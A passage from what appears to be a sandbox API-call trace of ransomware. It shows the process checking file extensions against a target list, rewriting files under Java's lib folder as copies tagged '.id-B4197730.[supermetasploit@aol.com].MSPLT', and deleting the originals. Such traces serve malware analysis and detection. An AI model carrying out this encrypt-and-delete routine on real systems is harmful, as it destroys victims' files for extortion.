returned 4 [0298.615] lstrcmpiW (lpString1=".rar", lpString2="B.pf") returned -1 [0298.615] lstrlenW (lpString=".bz2") returned 4 [0298.615] lstrcmpiW (lpString1=".bz2", lpString2="B.pf") returned -1 [0298.615] lstrlenW (lpString=".7z") returned 3 [0298.615] lstrcmpiW (lpString1=".7z", lpString2=".pf") returned -1 [0298.615] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\LINEAR_RGB.pf") returned 56 [0298.615] lstrlenW (lpString=".dbf") returned 4 [0298.615] lstrcmpiW (lpString1=".dbf", lpString2="B.pf") returned -1 [0298.616] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\LINEAR_RGB.pf") returned 56 [0298.616] lstrlenW (lpString=".1cd") returned 4 [0298.616] lstrcmpiW (lpString1=".1cd", lpString2="B.pf") returned -1 [0298.616] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\LINEAR_RGB.pf") returned 56 [0298.616] lstrlenW (lpString=".jpg") returned 4 [0298.616] lstrcmpiW (lpString1=".jpg", lpString2="B.pf") returned -1 [0298.616] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\LINEAR_RGB.pf") returned 56 [0298.616] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\LINEAR_RGB.pf") returned 56 [0298.616] lstrlenW (lpString=".doc") returned 4 [0298.616] lstrcmpiW (lpString1=".doc", lpString2="B.pf") returned -1 [0298.616] lstrlenW (lpString=".docx") returned 5 [0298.616] lstrcmpiW (lpString1=".docx", lpString2="GB.pf") returned -1 [0298.616] lstrlenW (lpString=".pdf") returned 4 [0298.616] lstrcmpiW (lpString1=".pdf", lpString2="B.pf") returned -1 [0298.616] lstrlenW (lpString=".xls") returned 4 [0298.616] lstrcmpiW (lpString1=".xls", lpString2="B.pf") returned -1 [0298.616] lstrlenW (lpString=".xlsx") returned 5 [0298.616] lstrcmpiW (lpString1=".xlsx", lpString2="GB.pf") returned -1 [0298.616] lstrlenW (lpString=".ppt") returned 4 [0298.616] lstrcmpiW (lpString1=".ppt", lpString2="B.pf") returned -1 [0298.616] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\LINEAR_RGB.pf") returned 56 [0298.616] lstrlenW (lpString=".zip") returned 4 [0298.616] lstrcmpiW (lpString1=".zip", lpString2="B.pf") returned -1 [0298.616] lstrlenW (lpString=".rar") returned 4 [0298.616] lstrcmpiW (lpString1=".rar", lpString2="B.pf") returned -1 [0298.616] lstrlenW (lpString=".bz2") returned 4 [0298.616] lstrcmpiW (lpString1=".bz2", lpString2="B.pf") returned -1 [0298.616] lstrlenW (lpString=".7z") returned 3 [0298.616] lstrcmpiW (lpString1=".7z", lpString2=".pf") returned -1 [0298.616] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\LINEAR_RGB.pf") returned 56 [0298.617] lstrlenW (lpString=".dbf") returned 4 [0298.617] lstrcmpiW (lpString1=".dbf", lpString2="B.pf") returned -1 [0298.617] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\LINEAR_RGB.pf") returned 56 [0298.617] lstrlenW (lpString=".1cd") returned 4 [0298.617] lstrcmpiW (lpString1=".1cd", lpString2="B.pf") returned -1 [0298.617] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\LINEAR_RGB.pf") returned 56 [0298.617] lstrlenW (lpString=".jpg") returned 4 [0298.617] lstrcmpiW (lpString1=".jpg", lpString2="B.pf") returned -1 [0298.617] lstrcmpiW (lpString1=".pf", lpString2=".MSPLT") returned 1 [0298.617] lstrlenW (lpString="sRGB.pf") returned 7 [0298.617] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\sRGB.pf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\srgb.pf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0298.617] GetFileSizeEx (in: hFile=0x440, lpFileSize=0x335ff14 | out: lpFileSize=0x335ff14*=3144) returned 1 [0298.618] CloseHandle (hObject=0x440) returned 1 [0298.618] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\sRGB.pf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\srgb.pf")) returned 0x20 [0298.618] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\sRGB.pf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\srgb.pf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0298.618] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\sRGB.pf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\srgb.pf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0298.618] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0298.618] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0298.618] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\sRGB.pf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\srgb.pf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x46c [0298.619] GetLastError () returned 0x0 [0298.619] ReadFile (in: hFile=0x440, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0xc48, lpOverlapped=0x0) returned 1 [0298.641] WriteFile (in: hFile=0x46c, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0xc50, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0xc50, lpOverlapped=0x0) returned 1 [0298.643] ReadFile (in: hFile=0x440, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x0, lpOverlapped=0x0) returned 1 [0298.643] WriteFile (in: hFile=0x46c, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0xe2, lpOverlapped=0x0) returned 1 [0298.643] SetEndOfFile (hFile=0x46c) returned 1 [0298.643] CloseHandle (hObject=0x46c) returned 1 [0298.644] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0298.644] SetEndOfFile (hFile=0x440) returned 1 [0298.647] CloseHandle (hObject=0x440) returned 1 [0298.647] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\sRGB.pf.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0298.648] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\sRGB.pf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\srgb.pf")) returned 1 [0298.649] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\sRGB.pf") returned 50 [0298.649] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\sRGB.pf") returned 50 [0298.649] lstrlenW (lpString=".doc") returned 4 [0298.649] lstrcmpiW (lpString1=".doc", lpString2="B.pf") returned -1 [0298.649] lstrlenW (lpString=".docx") returned 5 [0298.649] lstrcmpiW (lpString1=".docx", lpString2="GB.pf") returned -1 [0298.649] lstrlenW (lpString=".pdf") returned 4 [0298.649] lstrcmpiW (lpString1=".pdf", lpString2="B.pf") returned -1 [0298.649] lstrlenW (lpString=".xls") returned 4 [0298.649] lstrcmpiW (lpString1=".xls", lpString2="B.pf") returned -1 [0298.649] lstrlenW (lpString=".xlsx") returned 5 [0298.649] lstrcmpiW (lpString1=".xlsx", lpString2="GB.pf") returned -1 [0298.649] lstrlenW (lpString=".ppt") returned 4 [0298.649] lstrcmpiW (lpString1=".ppt", lpString2="B.pf") returned -1 [0298.649] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\sRGB.pf") returned 50 [0298.649] lstrlenW (lpString=".zip") returned 4 [0298.649] lstrcmpiW (lpString1=".zip", lpString2="B.pf") returned -1 [0298.649] lstrlenW (lpString=".rar") returned 4 [0298.649] lstrcmpiW (lpString1=".rar", lpString2="B.pf") returned -1 [0298.649] lstrlenW (lpString=".bz2") returned 4 [0298.649] lstrcmpiW (lpString1=".bz2", lpString2="B.pf") returned -1 [0298.649] lstrlenW (lpString=".7z") returned 3 [0298.649] lstrcmpiW (lpString1=".7z", lpString2=".pf") returned -1 [0298.649] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\sRGB.pf") returned 50 [0298.649] lstrlenW (lpString=".dbf") returned 4 [0298.649] lstrcmpiW (lpString1=".dbf", lpString2="B.pf") returned -1 [0298.649] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\sRGB.pf") returned 50 [0298.650] lstrlenW (lpString=".1cd") returned 4 [0298.650] lstrcmpiW (lpString1=".1cd", lpString2="B.pf") returned -1 [0298.650] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\sRGB.pf") returned 50 [0298.650] lstrlenW (lpString=".jpg") returned 4 [0298.650] lstrcmpiW (lpString1=".jpg", lpString2="B.pf") returned -1 [0298.650] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\sRGB.pf") returned 50 [0298.650] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\sRGB.pf") returned 50 [0298.650] lstrlenW (lpString=".doc") returned 4 [0298.650] lstrcmpiW (lpString1=".doc", lpString2="B.pf") returned -1 [0298.650] lstrlenW (lpString=".docx") returned 5 [0298.650] lstrcmpiW (lpString1=".docx", lpString2="GB.pf") returned -1 [0298.650] lstrlenW (lpString=".pdf") returned 4 [0298.650] lstrcmpiW (lpString1=".pdf", lpString2="B.pf") returned -1 [0298.650] lstrlenW (lpString=".xls") returned 4 [0298.650] lstrcmpiW (lpString1=".xls", lpString2="B.pf") returned -1 [0298.650] lstrlenW (lpString=".xlsx") returned 5 [0298.650] lstrcmpiW (lpString1=".xlsx", lpString2="GB.pf") returned -1 [0298.650] lstrlenW (lpString=".ppt") returned 4 [0298.650] lstrcmpiW (lpString1=".ppt", lpString2="B.pf") returned -1 [0298.650] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\sRGB.pf") returned 50 [0298.650] lstrlenW (lpString=".zip") returned 4 [0298.650] lstrcmpiW (lpString1=".zip", lpString2="B.pf") returned -1 [0298.650] lstrlenW (lpString=".rar") returned 4 [0298.650] lstrcmpiW (lpString1=".rar", lpString2="B.pf") returned -1 [0298.650] lstrlenW (lpString=".bz2") returned 4 [0298.650] lstrcmpiW (lpString1=".bz2", lpString2="B.pf") returned -1 [0298.650] lstrlenW (lpString=".7z") returned 3 [0298.650] lstrcmpiW (lpString1=".7z", lpString2=".pf") returned -1 [0298.650] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\sRGB.pf") returned 50 [0298.650] lstrlenW (lpString=".dbf") returned 4 [0298.650] lstrcmpiW (lpString1=".dbf", lpString2="B.pf") returned -1 [0298.650] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\sRGB.pf") returned 50 [0298.651] lstrlenW (lpString=".1cd") returned 4 [0298.651] lstrcmpiW (lpString1=".1cd", lpString2="B.pf") returned -1 [0298.651] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\sRGB.pf") returned 50 [0298.651] lstrlenW (lpString=".jpg") returned 4 [0298.651] lstrcmpiW (lpString1=".jpg", lpString2="B.pf") returned -1 [0298.651] lstrcmpiW (lpString1=".properties", lpString2=".MSPLT") returned 1 [0298.651] lstrlenW (lpString="content-types.properties") returned 24 [0298.651] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\content-types.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\content-types.properties"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0298.652] GetFileSizeEx (in: hFile=0x440, lpFileSize=0x335ff14 | out: lpFileSize=0x335ff14*=5548) returned 1 [0298.652] CloseHandle (hObject=0x440) returned 1 [0298.652] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\content-types.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\content-types.properties")) returned 0x20 [0298.652] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\content-types.properties.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\content-types.properties.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0298.652] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\content-types.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\content-types.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0298.652] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0298.652] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0298.652] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\content-types.properties.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\content-types.properties.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x46c [0298.653] GetLastError () returned 0x0 [0298.653] ReadFile (in: hFile=0x440, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x15ac, lpOverlapped=0x0) returned 1 [0298.773] WriteFile (in: hFile=0x46c, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0x15b0, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0x15b0, lpOverlapped=0x0) returned 1 [0298.775] ReadFile (in: hFile=0x440, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x0, lpOverlapped=0x0) returned 1 [0298.775] WriteFile (in: hFile=0x46c, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0x104, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0x104, lpOverlapped=0x0) returned 1 [0298.775] SetEndOfFile (hFile=0x46c) returned 1 [0298.775] CloseHandle (hObject=0x46c) returned 1 [0298.776] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0298.776] SetEndOfFile (hFile=0x440) returned 1 [0298.781] CloseHandle (hObject=0x440) returned 1 [0298.781] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\content-types.properties.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0298.782] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\content-types.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\content-types.properties")) returned 1 [0298.784] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\content-types.properties") returned 63 [0298.784] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\content-types.properties") returned 63 [0298.784] lstrlenW (lpString=".doc") returned 4 [0298.784] lstrcmpiW (lpString1=".doc", lpString2="ties") returned -1 [0298.784] lstrlenW (lpString=".docx") returned 5 [0298.784] lstrcmpiW (lpString1=".docx", lpString2="rties") returned -1 [0298.784] lstrlenW (lpString=".pdf") returned 4 [0298.784] lstrcmpiW (lpString1=".pdf", lpString2="ties") returned -1 [0298.785] lstrlenW (lpString=".xls") returned 4 [0298.785] lstrcmpiW (lpString1=".xls", lpString2="ties") returned -1 [0298.785] lstrlenW (lpString=".xlsx") returned 5 [0298.785] lstrcmpiW (lpString1=".xlsx", lpString2="rties") returned -1 [0298.785] lstrlenW (lpString=".ppt") returned 4 [0298.785] lstrcmpiW (lpString1=".ppt", lpString2="ties") returned -1 [0298.785] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\content-types.properties") returned 63 [0298.785] lstrlenW (lpString=".zip") returned 4 [0298.785] lstrcmpiW (lpString1=".zip", lpString2="ties") returned -1 [0298.785] lstrlenW (lpString=".rar") returned 4 [0298.785] lstrcmpiW (lpString1=".rar", lpString2="ties") returned -1 [0298.785] lstrlenW (lpString=".bz2") returned 4 [0298.785] lstrcmpiW (lpString1=".bz2", lpString2="ties") returned -1 [0298.785] lstrlenW (lpString=".7z") returned 3 [0298.785] lstrcmpiW (lpString1=".7z", lpString2="ies") returned -1 [0298.785] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\content-types.properties") returned 63 [0298.785] lstrlenW (lpString=".dbf") returned 4 [0298.786] lstrcmpiW (lpString1=".dbf", lpString2="ties") returned -1 [0298.786] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\content-types.properties") returned 63 [0298.786] lstrlenW (lpString=".1cd") returned 4 [0298.786] lstrcmpiW (lpString1=".1cd", lpString2="ties") returned -1 [0298.786] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\content-types.properties") returned 63 [0298.786] lstrlenW (lpString=".jpg") returned 4 [0298.786] lstrcmpiW (lpString1=".jpg", lpString2="ties") returned -1 [0298.786] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\content-types.properties") returned 63 [0298.786] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\content-types.properties") returned 63 [0298.786] lstrlenW (lpString=".doc") returned 4 [0298.786] lstrcmpiW (lpString1=".doc", lpString2="ties") returned -1 [0298.786] lstrlenW (lpString=".docx") returned 5 [0298.786] lstrcmpiW (lpString1=".docx", lpString2="rties") returned -1 [0298.786] lstrlenW (lpString=".pdf") returned 4 [0298.786] lstrcmpiW (lpString1=".pdf", lpString2="ties") returned -1 [0298.786] lstrlenW (lpString=".xls") returned 4 [0298.786] lstrcmpiW (lpString1=".xls", lpString2="ties") returned -1 [0298.786] lstrlenW (lpString=".xlsx") returned 5 [0298.786] lstrcmpiW (lpString1=".xlsx", lpString2="rties") returned -1 [0298.786] lstrlenW (lpString=".ppt") returned 4 [0298.786] lstrcmpiW (lpString1=".ppt", lpString2="ties") returned -1 [0298.786] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\content-types.properties") returned 63 [0298.786] lstrlenW (lpString=".zip") returned 4 [0298.786] lstrcmpiW (lpString1=".zip", lpString2="ties") returned -1 [0298.786] lstrlenW (lpString=".rar") returned 4 [0298.786] lstrcmpiW (lpString1=".rar", lpString2="ties") returned -1 [0298.786] lstrlenW (lpString=".bz2") returned 4 [0298.786] lstrcmpiW (lpString1=".bz2", lpString2="ties") returned -1 [0298.787] lstrlenW (lpString=".7z") returned 3 [0298.787] lstrcmpiW (lpString1=".7z", lpString2="ies") returned -1 [0298.787] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\content-types.properties") returned 63 [0298.787] lstrlenW (lpString=".dbf") returned 4 [0298.787] lstrcmpiW (lpString1=".dbf", lpString2="ties") returned -1 [0298.787] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\content-types.properties") returned 63 [0298.787] lstrlenW (lpString=".1cd") returned 4 [0298.787] lstrcmpiW (lpString1=".1cd", lpString2="ties") returned -1 [0298.787] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\content-types.properties") returned 63 [0298.787] lstrlenW (lpString=".jpg") returned 4 [0298.787] lstrcmpiW (lpString1=".jpg", lpString2="ties") returned -1 [0298.787] lstrcmpiW (lpString1=".properties", lpString2=".MSPLT") returned 1 [0298.787] lstrlenW (lpString="messages.properties") returned 19 [0298.787] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages.properties"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0298.792] GetFileSizeEx (in: hFile=0x440, lpFileSize=0x335ff14 | out: lpFileSize=0x335ff14*=2860) returned 1 [0298.792] CloseHandle (hObject=0x440) returned 1 [0298.792] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages.properties")) returned 0x20 [0298.793] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages.properties.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages.properties.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0298.794] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0298.794] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0298.794] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0298.794] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages.properties.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages.properties.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x470 [0298.811] GetLastError () returned 0x0 [0298.811] ReadFile (in: hFile=0x440, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0xb2c, lpOverlapped=0x0) returned 1 [0298.816] WriteFile (in: hFile=0x470, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0xb30, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0xb30, lpOverlapped=0x0) returned 1 [0298.818] ReadFile (in: hFile=0x440, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x0, lpOverlapped=0x0) returned 1 [0298.818] WriteFile (in: hFile=0x470, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0xfa, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0xfa, lpOverlapped=0x0) returned 1 [0298.818] SetEndOfFile (hFile=0x470) returned 1 [0298.818] CloseHandle (hObject=0x470) returned 1 [0298.823] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0298.823] SetEndOfFile (hFile=0x440) returned 1 [0299.627] CloseHandle (hObject=0x440) returned 1 [0299.627] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages.properties.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0300.351] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages.properties")) returned 1 [0300.669] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages.properties") returned 65 [0300.669] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages.properties") returned 65 [0300.670] lstrlenW (lpString=".doc") returned 4 [0300.670] lstrcmpiW (lpString1=".doc", lpString2="ties") returned -1 [0300.670] lstrlenW (lpString=".docx") returned 5 [0300.670] lstrcmpiW (lpString1=".docx", lpString2="rties") returned -1 [0300.670] lstrlenW (lpString=".pdf") returned 4 [0300.670] lstrcmpiW (lpString1=".pdf", lpString2="ties") returned -1 [0300.670] lstrlenW (lpString=".xls") returned 4 [0300.670] lstrcmpiW (lpString1=".xls", lpString2="ties") returned -1 [0300.670] lstrlenW (lpString=".xlsx") returned 5 [0300.670] lstrcmpiW (lpString1=".xlsx", lpString2="rties") returned -1 [0300.670] lstrlenW (lpString=".ppt") returned 4 [0300.670] lstrcmpiW (lpString1=".ppt", lpString2="ties") returned -1 [0300.670] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages.properties") returned 65 [0300.670] lstrlenW (lpString=".zip") returned 4 [0300.670] lstrcmpiW (lpString1=".zip", lpString2="ties") returned -1 [0300.670] lstrlenW (lpString=".rar") returned 4 [0300.670] lstrcmpiW (lpString1=".rar", lpString2="ties") returned -1 [0300.670] lstrlenW (lpString=".bz2") returned 4 [0300.670] lstrcmpiW (lpString1=".bz2", lpString2="ties") returned -1 [0300.670] lstrlenW (lpString=".7z") returned 3 [0300.670] lstrcmpiW (lpString1=".7z", lpString2="ies") returned -1 [0300.670] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages.properties") returned 65 [0300.670] lstrlenW (lpString=".dbf") returned 4 [0300.670] lstrcmpiW (lpString1=".dbf", lpString2="ties") returned -1 [0300.670] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages.properties") returned 65 [0300.670] lstrlenW (lpString=".1cd") returned 4 [0300.670] lstrcmpiW (lpString1=".1cd", lpString2="ties") returned -1 [0300.670] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages.properties") returned 65 [0300.670] lstrlenW (lpString=".jpg") returned 4 [0300.670] lstrcmpiW (lpString1=".jpg", lpString2="ties") returned -1 [0300.670] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages.properties") returned 65 [0300.670] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages.properties") returned 65 [0300.670] lstrlenW (lpString=".doc") returned 4 [0300.670] lstrcmpiW (lpString1=".doc", lpString2="ties") returned -1 [0300.671] lstrlenW (lpString=".docx") 